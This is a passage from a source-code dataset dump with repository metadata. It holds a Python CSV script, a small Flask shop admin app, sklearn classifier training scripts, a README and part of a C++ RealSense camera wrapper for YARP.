"alpha_fraction": 0.5354223251342773,
"alphanum_fraction": 0.555858314037323,
"avg_line_length": 22.677419662475586,
"blob_id": "0e9380c34e94a71435b62ecb43be4d3ba769bcef",
"content_id": "453c7e822718359f363a5a389c96a301363c3d23",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 734,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 31,
"path": "/matrices/python/start_times.py",
"repo_name": "ipat81/indepedent_study",
"src_encoding": "UTF-8",
"text": "import sys, csv\nfrom collections import Counter\n\nTIME_DELTA = 60 * 10\n\ndef print_start_times(filename):\n f = open(filename, 'rb')\n reader = csv.reader(f)\n\n start_times_count = Counter()\n prev_vid = -1\n for row in reader:\n if len(row) < 4:\n continue\n\n vid = int(row[0])\n if prev_vid != vid:\n # new start time\n start_time = int(row[1]) / TIME_DELTA\n start_times_count[start_time] += 1\n\n prev_vid = vid\n\n print '10 most common time intervals: ', start_times_count.most_common(10)\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print 'Usage: python start_times.py <data_file>'\n exit()\n\n print_start_times(sys.argv[1])\n"
},
{
"alpha_fraction": 0.5100154280662537,
"alphanum_fraction": 0.5208012461662292,
"avg_line_length": 21.379310607910156,
"blob_id": "095437f07f00d0edd77b1f8a3528076debfd8f64",
"content_id": "955cb23b738f0c7b9518e5ccd745614743406c38",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 649,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 29,
"path": "/matrices/python/create_smaller_file.py",
"repo_name": "ipat81/indepedent_study",
"src_encoding": "UTF-8",
"text": "import csv\n\n\ndef create_smaller_file(filename):\n original_file = open(filename)\n reader = csv.reader(original_file)\n\n small_filename = 'small_' + filename\n new_file = open(small_filename, 'w')\n\n previous_id = -1\n\n for row in reader:\n if len(row) > 1:\n curr_id = int(row[0])\n\n if curr_id != previous_id:\n if curr_id == 100:\n break\n\n for entry in row:\n if row[len(row)-1] == entry:\n new_file.write(str(entry))\n else:\n new_file.write(str(entry) + ',')\n new_file.write('\\n')\n\n\ncreate_smaller_file('private_raw_p.txt')\n"
}
] | 12 |
safwanvk/shop | https://github.com/safwanvk/shop | e25c780c7b3bc08e1bc3af4fa4b70c0d89242ee7 | caae8fc5d2252ba3deb4d9ca4d9aa15082d411e4 | 7af1e7db4a1f72d4150658dd14d5c4003e207c66 | refs/heads/master | 2022-12-12T20:19:50.418516 | 2020-09-06T15:22:19 | 2020-09-06T15:22:19 | 293,474,459 | 0 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.6459378004074097,
"alphanum_fraction": 0.652958869934082,
"avg_line_length": 54.38888931274414,
"blob_id": "5aa3dc36fd7c9ad2a30291362e3d981e830355ca",
"content_id": "5cca9daa8b8a626a804143e1436e13e21c7036f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 997,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 18,
"path": "/shop/products/forms.py",
"repo_name": "safwanvk/shop",
"src_encoding": "UTF-8",
"text": "from wtforms import Form, BooleanField, StringField, PasswordField, validators, IntegerField, TextAreaField, \\\n DecimalField\nfrom flask_wtf.file import FileAllowed, FileRequired, FileField\n\n\nclass AddProductForm(Form):\n name = StringField('Name', [validators.DataRequired()])\n price = DecimalField('Price', [validators.DataRequired()])\n discount = IntegerField('Discount', default=0)\n stock = IntegerField('Stock', [validators.DataRequired()])\n discription = TextAreaField('Discription', [validators.DataRequired()])\n colors = TextAreaField('Colors', [validators.DataRequired()])\n image_1 = FileField('Image 1',\n validators=[FileRequired(), FileAllowed(['jpg', 'png', 'gif', 'jpeg'])])\n image_2 = FileField('Image 2',\n validators=[FileRequired(), FileAllowed(['jpg', 'png', 'gif', 'jpeg'])])\n image_3 = FileField('Image 3',\n validators=[FileRequired(), FileAllowed(['jpg', 'png', 'gif', 'jpeg'])])\n"
},
{
"alpha_fraction": 0.7511811256408691,
"alphanum_fraction": 0.7511811256408691,
"avg_line_length": 27.863636016845703,
"blob_id": "a6d5af7e519a74c25611508dd7af08f7d2f5a01b",
"content_id": "f19361ab00b2b2054e8bc5b36cf11deb7e38cdb9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 635,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 22,
"path": "/shop/__init__.py",
"repo_name": "safwanvk/shop",
"src_encoding": "UTF-8",
"text": "import os\n\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_bcrypt import Bcrypt\nfrom flask_uploads import IMAGES, UploadSet, configure_uploads, patch_request_class\n\n\nBASE_DIRS = os.path.abspath(os.path.dirname(__file__))\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///shop.db'\napp.config['SECRET_KEY'] = 'ffjdbfdbfjsdgfs43543745'\napp.config['UPLOADED_PHOTOS_DEST'] = os.path.join(BASE_DIRS, 'static/images')\nphotos = UploadSet('photos', IMAGES)\nconfigure_uploads(app, photos)\npatch_request_class(app)\n\ndb = SQLAlchemy(app)\nbcrypt = Bcrypt(app)\n\nfrom .admin import routes\nfrom .products import routes\n"
},
{
"alpha_fraction": 0.6440258622169495,
"alphanum_fraction": 0.6491628885269165,
"avg_line_length": 39.1297721862793,
"blob_id": "74b5b3b8c52c15036731c10d6640bc9b73c1f821",
"content_id": "30f2d6af69d46ee3bc912e365ce7e6a471c77483",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5256,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 131,
"path": "/shop/products/routes.py",
"repo_name": "safwanvk/shop",
"src_encoding": "UTF-8",
"text": "import secrets\n\nfrom flask import render_template, request, flash, url_for, session\n\nfrom shop import app\nfrom werkzeug.utils import redirect\n\nfrom .forms import AddProductForm\nfrom .models import Brand, Category, Product\nfrom .. import db, photos\n\n\[email protected]('/add-brand', methods=['GET', 'POST'])\ndef add_brand():\n if 'email' not in session:\n flash(f'Please login first', 'danger')\n return redirect(url_for('login'))\n if request.method == 'POST':\n get_brand = request.form['brand']\n brand = Brand(name=get_brand)\n db.session.add(brand)\n db.session.commit()\n flash(f'The brand {get_brand} was added to your database', 'success')\n return redirect(url_for('add_brand'))\n return render_template('products/add_brand.html', brands='brands')\n\n\[email protected]('/update-brand/<int:id>', methods=['GET', 'POST'])\ndef update_brand(id):\n if 'email' not in session:\n flash(f'Please login first', 'danger')\n return redirect(url_for('login'))\n update_brand = Brand.query.get_or_404(id)\n brand = request.form.get('brand')\n if request.method == 'POST':\n update_brand.name = brand\n flash(f'Your brand has been updated', 'success')\n db.session.commit()\n return redirect(url_for('view_brands'))\n return render_template('products/update_brand.html', update_brand=update_brand)\n\n\[email protected]('/add-category', methods=['GET', 'POST'])\ndef add_category():\n if 'email' not in session:\n flash(f'Please login first', 'danger')\n return redirect(url_for('login'))\n if request.method == 'POST':\n get_category = request.form['category']\n category = Category(name=get_category)\n db.session.add(category)\n db.session.commit()\n flash(f'The Category {get_category} was added to your database', 'success')\n return redirect(url_for('add_category'))\n return render_template('products/add_brand.html')\n\n\[email protected]('/update-category/<int:id>', methods=['GET', 'POST'])\ndef update_category(id):\n if 'email' not in session:\n flash(f'Please login first', 'danger')\n return redirect(url_for('login'))\n update_category = Category.query.get_or_404(id)\n category = request.form.get('category')\n if request.method == 'POST':\n update_category.name = category\n flash(f'Your category has been updated', 'success')\n db.session.commit()\n return redirect(url_for('view_categories'))\n return render_template('products/update_brand.html', update_category=update_category)\n\n\[email protected]('/add-product', methods=['GET', 'POST'])\ndef add_product():\n if 'email' not in session:\n flash(f'Please login first', 'danger')\n return redirect(url_for('login'))\n brands = Brand.query.all()\n categories = Category.query.all()\n form = AddProductForm(request.form)\n if request.method == 'POST':\n name = form.name.data\n price = form.price.data\n discount = form.discount.data\n stock = form.stock.data\n colors = form.colors.data\n desc = form.discription.data\n brand = request.form.get('brand')\n category = request.form.get('category')\n image_1 = photos.save(request.files.get('image_1'), name=secrets.token_hex(10) + '.')\n image_2 = photos.save(request.files.get('image_2'), name=secrets.token_hex(10) + '.')\n image_3 = photos.save(request.files.get('image_3'), name=secrets.token_hex(10) + '.')\n addpro = Product(name=name, price=price, discount=discount, stock=stock, colors=colors, desc=desc,\n brand_id=brand, category_id=category, image_1=image_1, image_2=image_2, image_3=image_3)\n db.session.add(addpro)\n flash(f'The product {name} has been added to your database', 'success')\n db.session.commit()\n return redirect(url_for('admin'))\n return render_template('products/add_product.html', form=form, brands=brands, categories=categories)\n\n\[email protected]('/update-product/<int:id>', methods=['GET', 'POST'])\ndef update_product(id):\n if 'email' not in session:\n flash(f'Please login first', 'danger')\n return redirect(url_for('login'))\n brands = Brand.query.all()\n categories = Category.query.all()\n product = Product.query.get_or_404(id)\n brand = request.form.get('brand')\n category = request.form.get('category')\n form = AddProductForm(request.form)\n if request.method == 'POST':\n product.name = form.name.data\n product.price = form.price.data\n product.discount = form.discount.data\n product.stock = form.stock.data\n product.brand_id = brand\n product.category_id = category\n product.colors = form.colors.data\n product.desc = form.discription.data\n db.session.commit()\n flash(f'Your product has been updated', 'success')\n return redirect(url_for('admin'))\n form.name.data = product.name\n form.price.data = product.price\n form.discount.data = product.discount\n form.stock.data = product.stock\n form.colors.data = product.colors\n form.discription.data = product.desc\n return render_template('products/update_product.html', form=form, brands=brands, categories=categories, product=product)"
},
{
"alpha_fraction": 0.6640784740447998,
"alphanum_fraction": 0.6640784740447998,
"avg_line_length": 34.985294342041016,
"blob_id": "9dbe303a0a7a8344dd19f98570ba73ffb561f776",
"content_id": "fb96a93209689f8abb254434decb91400a7ab953",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2447,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 68,
"path": "/shop/admin/routes.py",
"repo_name": "safwanvk/shop",
"src_encoding": "UTF-8",
"text": "from flask import Flask, render_template, request, flash, url_for, session\n\nfrom werkzeug.utils import redirect\n\nfrom .forms import RegistrationForm, LoginForm\nfrom .models import User\nfrom .. import app, db, bcrypt\nfrom ..products.models import Product, Brand, Category\n\n\[email protected]('/')\ndef index():\n return render_template('admin/index.html')\n\n\[email protected]('/admin')\ndef admin():\n if 'email' not in session:\n flash(f'Please login first', 'danger')\n return redirect(url_for('login'))\n products = Product.query.all()\n return render_template('admin/index.html', products=products)\n\n\[email protected]('/brands')\ndef view_brands():\n if 'email' not in session:\n flash(f'Please login first', 'danger')\n return redirect(url_for('login'))\n brands = Brand.query.order_by(Brand.id.desc()).all()\n return render_template('admin/brands.html', brands=brands)\n\n\[email protected]('/categories')\ndef view_categories():\n if 'email' not in session:\n flash(f'Please login first', 'danger')\n return redirect(url_for('login'))\n categories = Category.query.order_by(Category.id.desc()).all()\n return render_template('admin/brands.html', categories=categories)\n\n\[email protected]('/register', methods=['GET', 'POST'])\ndef register():\n form = RegistrationForm(request.form)\n if request.method == 'POST' and form.validate():\n hash_password = bcrypt.generate_password_hash(form.password.data)\n user = User(name=form.name.data, username=form.username.data, email=form.email.data,\n password=hash_password)\n db.session.add(user)\n db.session.commit()\n flash(f'Welcome {form.name.data} Thank you for registering', 'success')\n return redirect(url_for('index'))\n return render_template('admin/register.html', form=form)\n\n\[email protected]('/login', methods=['GET', 'POST'])\ndef login():\n form = LoginForm(request.form)\n if request.method == 'POST' and form.validate():\n user = User.query.filter_by(email=form.email.data).first()\n if user and bcrypt.check_password_hash(user.password, form.password.data):\n session['email'] = form.email.data\n flash(f'Welcome {form.email.data} You are logged in now', 'success')\n return redirect(request.args.get('next') or url_for('admin'))\n else:\n flash('Wrong Password please try again', 'danger')\n return render_template('admin/login.html', form=form)\n"
}
] | 4 |
frikenciovasquez/frikencio | https://github.com/frikenciovasquez/frikencio | aaf05bca7ce0453c2f59f65811cd3a0219a3a708 | aca9d1f3f778a7fd9691364da7be98b3082b24c1 | 1357cf77b8b0b80d65c1c3ed442cbd6ec0b69cce | refs/heads/master | 2020-03-16T23:46:29.969511 | 2018-05-13T15:50:54 | 2018-05-13T15:50:54 | 133,090,644 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7916666865348816,
"alphanum_fraction": 0.7916666865348816,
"avg_line_length": 11,
"blob_id": "9d8ea6ef48f7756d8608e054b4a076fca8af0b9d",
"content_id": "15a455cbf690d6924971ddca0eaa37d876a01866",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 24,
"license_type": "no_license",
"max_line_length": 11,
"num_lines": 2,
"path": "/README.md",
"repo_name": "frikenciovasquez/frikencio",
"src_encoding": "UTF-8",
"text": "# frikencio\nmis mierdas\n"
},
{
"alpha_fraction": 0.4055047929286957,
"alphanum_fraction": 0.4495220184326172,
"avg_line_length": 26.997058868408203,
"blob_id": "672a165018b9b8d3d54fb6dca1b39bff5090b22a",
"content_id": "772bfdc71acb80a9466db43475afb87548e6f545",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9519,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 340,
"path": "/proyecto2.py",
"repo_name": "frikenciovasquez/frikencio",
"src_encoding": "UTF-8",
"text": "import pygame\nfrom random import randint\n#Dibuja triangulo y lo escala con el teclado\nANCHO=1200\nALTO=600\nVERDE=[0,255,0]\nAZUL=[0,0,255]\nROJO=[255,0,0]\nNEGRO=[0,0,0]\nBLANCO=[255,255,255]\n#focus=randint(1,2)\n#focus=1\n\nclass Jugador(pygame.sprite.Sprite):\n def __init__(self, accion=0):\n pygame.sprite.Sprite.__init__(self)\n self.accion=accion\n self.i=0\n self.image=pygame.Surface([40,100])\n self.image.fill(ROJO)\n self.rect=self.image.get_rect()\n self.vel_x=0\n self.vel_y=0\n self.rect.x=50\n self.rect.y=470\n self.focus=1\n self.salud=100\n\n def update(self):\n self.rect.y+=self.vel_y\n if self.rect.y>=(ALTO-self.rect.height):\n self.rect.y=ALTO-self.rect.height\n self.vel_y=0\n self.rect.x+=self.vel_x\n\nclass Jugador2(pygame.sprite.Sprite):\n def __init__(self, accion=0):\n pygame.sprite.Sprite.__init__(self)\n self.accion=accion\n self.i=0\n self.image=pygame.Surface([40,100])\n self.image.fill(AZUL)\n self.rect=self.image.get_rect()\n self.vel_x=0\n self.vel_y=0\n self.rect.x=145\n self.rect.y=320\n self.focus=2\n\n def update(self):\n self.rect.y+=self.vel_y\n if self.rect.y>=(ALTO-self.rect.height):\n self.rect.y=ALTO-self.rect.height\n self.vel_y=0\n self.rect.x+=self.vel_x\n\nclass Enemigo1(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.i=0\n self.image=pygame.Surface([40,100])\n self.image.fill(NEGRO)\n self.rect=self.image.get_rect()\n self.vel_x=3\n self.vel_y=0\n self.rect.x=randint(605,2400)\n self.rect.y=randint(ALTO-300,ALTO-100)\n self.salud=100\n self.vivo=1\n self.espera=1000\n self.focus=randint(1,2)\n\n def update (self):\n if self.vivo==1:\n self.espera-=2\n #print self.espera\n #print focus\n if self.espera<=900:\n #self.rect.x +=5\n self.rect.x += self.vel_x\n self.rect.y+= self.vel_y\n #self.vel_x=0\n if self.focus==1:\n if self.rect.x > j.rect.x:\n self.vel_x=-1.5\n if self.rect.x < j.rect.x:\n self.vel_x=1.5\n if self.rect.y < j.rect.y:\n self.vel_y=1.5\n if self.rect.y > j.rect.y:\n self.vel_y=-1.5\n if self.rect.y == j.rect.y:\n self.vel_y=0\n if self.rect.x == j.rect.x:\n self.vel_x=0\n if self.focus==2:\n if self.rect.x > j2.rect.x:\n self.vel_x=-1.5\n if self.rect.x < j2.rect.x:\n self.vel_x=1.5\n if self.rect.y < j2.rect.y:\n self.vel_y=1.5\n if self.rect.y > j2.rect.y:\n self.vel_y=-1.5\n if self.rect.y == j2.rect.y:\n self.vel_y=0\n if self.rect.x == j2.rect.x:\n self.vel_x=0\n\n\nclass Enemigo2(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.i=0\n self.image=pygame.Surface([100,40])\n self.image.fill(VERDE)\n self.rect=self.image.get_rect()\n self.vel_x=3\n self.vel_y=0\n self.rect.x=-1250\n self.rect.y=385\n self.espera=0\n self.vivo=1\n\n #def uptade(self):\n def update (self):\n if self.vivo==1:\n #print self.rect.x\n self.espera-=2\n #print self.espera\n\n if self.espera<=0:\n self.rect.x -=5\n\nif __name__ == '__main__':\n pygame.init()\n pantalla=pygame.display.set_mode([ANCHO,ALTO])\n fondo=pygame.image.load('fondo.png')\n fondo2=pygame.image.load('fondo2.png')\n info=fondo.get_rect()\n pygame.display.flip()\n pantalla.blit(fondo,[0,-500])\n pantalla.blit(fondo2,[0,-500])\n reloj=pygame.time.Clock()\n todos=pygame.sprite.Group()\n\n #juador1\n jugador=pygame.sprite.Group()\n j=Jugador()\n todos.add(j)\n jugador.add(j)\n #jugador2\n jugador2=pygame.sprite.Group()\n j2=Jugador2()\n todos.add(j2)\n #enemigos\n enemigos=pygame.sprite.Group()\n cantidad_enemigos1= 2 #randint(5,20)\n for i in range(cantidad_enemigos1):\n e1=Enemigo1()\n todos.add(e1)\n enemigos.add(e1)\n #if e1.espera == 800 or e1.espera==600 or e1.espera== 400:\n e1.vel_x=5\n\n cantidad_enemigos=randint(5,100)\n for i in range(cantidad_enemigos):\n e2=Enemigo2()\n e2.rect.x=1250*i\n e2.rect.y=randint(ALTO-300,ALTO-100)\n todos.add(e2)\n #enemigos.add(e2)\n\n print e1.focus\n fin=False\n info=fondo.get_rect()\n #print info\n pos_x=0\n pos_y=-500\n varx=-2\n vary=-2\n pista=pygame.mixer.Sound('musica.ogg')\n pista.play()\n x=0\n i=0\n while not fin:\n pos=pygame.mouse.get_pos()\n #print pos\n for event in pygame.event.get():\n if event.type==pygame.QUIT:\n fin=True\n if event.type==pygame.KEYDOWN:\n\n if event.key==pygame.K_RIGHT:\n j.vel_x=10\n\n if event.key==pygame.K_LEFT:\n j.vel_x=-10\n if event.key==pygame.K_UP:\n j.vel_y-=10\n if event.key==pygame.K_DOWN:\n j.vel_y=10\n\n if event.key==pygame.K_d:\n j2.vel_x=10\n\n if event.key==pygame.K_a:\n j2.vel_x=-10\n if event.key==pygame.K_w:\n\n j2.vel_y=-10\n if event.key==pygame.K_s:\n j2.vel_y=10\n\n\n if event.key==pygame.K_p:\n j.accion=1\n j.i=0\n\n if event.key==pygame.K_c:\n j2.accion=2\n j2.i=0\n\n\n if event.type== pygame.KEYUP:\n j.vel_x=0\n j.vel_y=0\n j2.vel_y=0\n j2.vel_x=0\n j.accion=0\n j2.accion=0\n if cantidad_enemigos1<=5:\n if j.rect.x>=(ANCHO-300)and pos_x>=-1000:\n pos_x-=10\n j.vel_x-=1\n if j.rect.x>=ANCHO-160:\n j.vel_x-=1\n\n if j.rect.x<=250 and pos_x<0:\n pos_x+=10\n if j.rect.x<15:\n j.vel_x=+1\n\n if j.rect.bottom <= 365 and j.rect.bottom<= ALTO:\n #pos_y=-2\n #j.vel_y=0\n pass\n if j.rect.y<=10 and pos_y<0:\n print pos_y\n\n #------------------------------------------------------------------\n if j2.rect.x>=(ANCHO-300)and pos_x>=-1000:\n pos_x-=10\n j2.vel_x-=1\n if j2.rect.x>=ANCHO-160:\n j2.vel_x-=1\n\n if j2.rect.x<=250 and pos_x<0:\n pos_x+=10\n if j2.rect.x<15:\n j2.vel_x=+1\n\n if j2.rect.bottom <= 365 and j2.rect.bottom<= ALTO:\n #pos_y=-2\n #j.vel_y=0\n pass\n if j2.rect.y<=10 and pos_y<0:\n print pos_y\n\n#-------------------------------------------------------------------------\n ls_col=pygame.sprite.spritecollide(j,enemigos,False)\n ls_col2=pygame.sprite.spritecollide(j2,enemigos,False)\n print 'colison1', ls_col\n print 'colision2', ls_col2\n #print ls_col\n if j.accion==1:\n #print '111111'\n\n for e in ls_col:\n if e1.rect.center>=(j.rect.left-25):\n e1.salud-=10\n if e1.salud<0:\n if e1.salud<=0:\n enemigos.remove(e1)\n todos.remove(e1)\n\n\n e1.rect.x+=10\n\n if j2.accion==2:\n #print '111111'\n\n for e in ls_col2:\n if e1.rect.center>=(j2.rect.left-25):\n e1.salud-=10\n if e1.salud<0:\n if e1.salud<=0:\n enemigos.remove(e1)\n todos.remove(e1)\n\n\n e1.rect.x+=10\n\n\n\n\n ''' colison enemigo jugador\n if (e1.rect.x+25)==(j.rect.x+25):\n ls_cols=pygame.sprite.spritecollide(e1,jugador,False)\n\n for d in ls_col:\n j.salud-=10\n\n e1.focus==2\n\n if j.salud <=0:\n\n jugador.remove(j)\n todos.remove(j)\n enemigos.remove(e1)\n todos.remove(e1)\n '''\n\n #print e1.espera\n print e1.salud\n print cantidad_enemigos1\n #print pos\n print enemigos\n #print info\n# print e1.focus\n# print j.salud\n enemigos.update()\n todos.update()\n #print e1.rect.x\n pantalla.fill(NEGRO)\n pantalla.blit(fondo2,[0,-500])\n pantalla.blit(fondo,[pos_x,pos_y])\n todos.draw(pantalla)\n pygame.display.flip()\n reloj.tick(60)\n"
}
] | 2 |
hesiyuan/smartCooking | https://github.com/hesiyuan/smartCooking | 8e001beca3adc047bb4d034ecc27fe3ea519bdda | 0ed7966a701be7e197e13ec2bb0774f575e5908e | fb04b1ea083cf997ddb1588dd0fa26fb2b02c6f3 | refs/heads/master | 2021-03-30T21:18:49.206398 | 2018-04-17T22:25:27 | 2018-04-17T22:25:27 | 124,711,963 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6229166388511658,
"alphanum_fraction": 0.6875,
"avg_line_length": 22.924999237060547,
"blob_id": "cf119fc15ecd4763e230602e4c21fb5388003820",
"content_id": "08aba56bcec686a7ae68b45c878311d9bfaf215c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 960,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 40,
"path": "/randomForest.py",
"repo_name": "hesiyuan/smartCooking",
"src_encoding": "UTF-8",
"text": "from sklearn.ensemble import RandomForestClassifier\nfrom sklearn.externals import joblib\n\nreg = RandomForestClassifier(max_depth=5, random_state=0)\n\n\n#construct a list for each example\nfile = open(\"centerPointsData3.txt\", \"r\") \nX = []\ny = []\nj = 0\nfor line in file:\n\texample = line.split()\n\t# construct a list for the example excluding the label\n\tl = []\n\ti = 0\n\tfor data in example:\n\t\tif i == 10:\n\t\t\ty.append(int(data))\n\t\telse:\n\t\t\tl.append(float(data))\n\t\ti = i + 1 \n\tX.append(l)\n\tj = j + 1\n\n#ut all lists into a big list\n# print(j, end=\" \")\nprint(\"data examples ready\")\n\n#construct a list for all labels\n\n#traniing\nreg.fit(X, y)\n#LinearRegression(copy_X=True, fit_intercept=True, n_jobs=1, normalize=False)\nprint(reg.get_params())\nprint(reg.predict(X))\nprint(reg.score(X,y))\njoblib.dump(reg, 'randomForest_v2.pkl', protocol=2) \n# clf = joblib.load('model.pkl') \n# print(clf.predict([[199.0, 199.0, 78.03135367296292, 72.125, 129.25, 65.57003514400586]]))\n\n\n\n"
},
{
"alpha_fraction": 0.6180048584938049,
"alphanum_fraction": 0.6861313581466675,
"avg_line_length": 21.135135650634766,
"blob_id": "af3d18aa2a614712f8f63807e0964701cc5bb306",
"content_id": "3e3602667e04a6620a803d5ae357216c77439323",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 822,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 37,
"path": "/logReg.py",
"repo_name": "hesiyuan/smartCooking",
"src_encoding": "UTF-8",
"text": "from sklearn import linear_model\nfrom sklearn.externals import joblib\n\nreg = linear_model.LogisticRegression()\n\n\n#construct a list for each example\nfile = open(\"centerPointsData.txt\", \"r\") \nX = []\ny = []\nfor line in file:\n\texample = line.split()\n\t# construct a list for the example excluding the label\n\tl = []\n\ti = 0\n\tfor data in example:\n\t\tif i == 10:\n\t\t\ty.append(int(data))\n\t\telse:\n\t\t\tl.append(float(data))\n\t\ti = i + 1 \n\tX.append(l)\n\n#ut all lists into a big list\n\n\n#construct a list for all labels\n\n#traniing\nreg.fit (X, y)\n#LinearRegression(copy_X=True, fit_intercept=True, n_jobs=1, normalize=False)\nprint(reg.get_params())\n\nprint(reg.predict(X))\njoblib.dump(reg, 'centerModel3.pkl') \n# clf = joblib.load('model.pkl') \n# print(clf.predict([[199.0, 199.0, 78.03135367296292, 72.125, 129.25, 65.57003514400586]]))\n\n\n\n"
},
{
"alpha_fraction": 0.7666666507720947,
"alphanum_fraction": 0.7833333611488342,
"avg_line_length": 34.79999923706055,
"blob_id": "e3cc62ea032c337d67864646b31a65fb478f04cc",
"content_id": "5095b9d60c06241b29b071f3a53f832d89f2416d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 180,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 5,
"path": "/README.md",
"repo_name": "hesiyuan/smartCooking",
"src_encoding": "UTF-8",
"text": "\n### Smart Cooking using voice and hand gesture to control video playback.\n\nThis project is written by python backend and javascript frontend\n\n[Demo](https://youtu.be/l39oJf6DfXY)\n"
}
] | 3 |
xEnVrE/robots-io | https://github.com/xEnVrE/robots-io | da1545d1965522340bdc712a23cc2c7c62641ca3 | a89e9b5be46898895728811c32c1103e2f9bf385 | 670367a580dfb3b1f666bd3ccd3f730c0f8d8e73 | refs/heads/master | 2023-05-24T16:47:33.488774 | 2023-05-14T11:13:08 | 2023-05-14T11:13:08 | 221,664,411 | 6 | 3 | BSD-3-Clause | 2019-11-14T09:55:14 | 2023-04-08T09:02:31 | 2023-05-14T11:13:08 | C++ | [
{
"alpha_fraction": 0.6472518444061279,
"alphanum_fraction": 0.6519004702568054,
"avg_line_length": 39.18681335449219,
"blob_id": "42eca2c7c0e2f35930cbebb2b2374953eb7a2583",
"content_id": "d70dce519d128e2ba07535a9f28aa4dea07e1a47",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3657,
"license_type": "permissive",
"max_line_length": 159,
"num_lines": 91,
"path": "/src/RobotsIO/src/Camera/RealsenseCameraYarp.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Camera/RealsenseCameraYarp.h>\n\n#include <yarp/dev/IRGBDSensor.h>\n#include <yarp/dev/PolyDriver.h>\n#include <yarp/os/Property.h>\n\nusing namespace RobotsIO::Camera;\nusing namespace yarp::dev;\nusing namespace yarp::os;\n\n\nRealsenseCameraYarp::RealsenseCameraYarp(const std::string& port_prefix, const std::size_t& width, const std::size_t& height) :\n RealsenseCameraYarp(port_prefix, true, width, height)\n{}\n\n\nRealsenseCameraYarp::RealsenseCameraYarp(const std::string& port_prefix) :\n RealsenseCameraYarp(port_prefix, false)\n{}\n\n\nRealsenseCameraYarp::RealsenseCameraYarp(const std::string& port_prefix, const bool& enforce_resolution, const std::size_t& width, const std::size_t& height) :\n YarpCamera(port_prefix)\n{\n /* Extract camera parameters. */\n yarp::dev::PolyDriver driver;\n yarp::dev::IRGBDSensor* interface;\n\n Property driver_properties;\n driver_properties.put(\"device\", \"RGBDSensorClient\");\n driver_properties.put(\"localImagePort\", \"/\" + port_prefix + \"/RGBDSensorClient/image:i\");\n driver_properties.put(\"localDepthPort\", \"/\" + port_prefix + \"/RGBDSensorClient/depth:i\");\n driver_properties.put(\"localRpcPort\", \"/\" + port_prefix + \"/RGBDSensorClient/rpc:i\");\n driver_properties.put(\"remoteImagePort\", \"/depthCamera/rgbImage:o\");\n driver_properties.put(\"remoteDepthPort\", \"/depthCamera/depthImage:o\");\n driver_properties.put(\"remoteRpcPort\", \"/depthCamera/rpc:i\");\n\n if (driver.open(driver_properties) && driver.view(interface) && (interface != nullptr))\n {\n Property camera_intrinsics;\n interface->getDepthIntrinsicParam(camera_intrinsics);\n\n std::size_t camera_width = interface->getRgbWidth();\n std::size_t camera_height = interface->getRgbHeight();\n\n double scaler_x = 1.0;\n double scaler_y = 1.0;\n if (enforce_resolution)\n {\n if ((width > camera_width) || (height > camera_height))\n throw(std::runtime_error(log_name_ + \"::ctor. Cannot enforce a resolution higher than the source resolution\"));\n\n scaler_x = width / camera_width;\n scaler_y = height / camera_height;\n }\n\n parameters_.width(camera_width * scaler_x);\n parameters_.height(camera_height * scaler_y);\n parameters_.fx(camera_intrinsics.find(\"focalLengthX\").asFloat64() * scaler_x);\n parameters_.fy(camera_intrinsics.find(\"focalLengthY\").asFloat64() * scaler_y);\n parameters_.cx(camera_intrinsics.find(\"principalPointX\").asFloat64() * scaler_x);\n parameters_.cy(camera_intrinsics.find(\"principalPointY\").asFloat64() * scaler_y);\n parameters_.initialized(true);\n\n driver.close();\n }\n else\n throw(std::runtime_error(log_name_ + \"::ctor. Cannot get camera parameters.\"));\n\n Camera::initialize();\n\n /* Log parameters. */\n std::cout << log_name_ + \"::ctor. Camera parameters:\" << std::endl;\n std::cout << log_name_ + \" - width: \" << parameters_.width() << std::endl;\n std::cout << log_name_ + \" - height: \" << parameters_.height() << std::endl;\n std::cout << log_name_ + \" - fx: \" << parameters_.fx() << std::endl;\n std::cout << log_name_ + \" - fy: \" << parameters_.fy() << std::endl;\n std::cout << log_name_ + \" - cx: \" << parameters_.cx() << std::endl;\n std::cout << log_name_ + \" - cy: \" << parameters_.cy() << 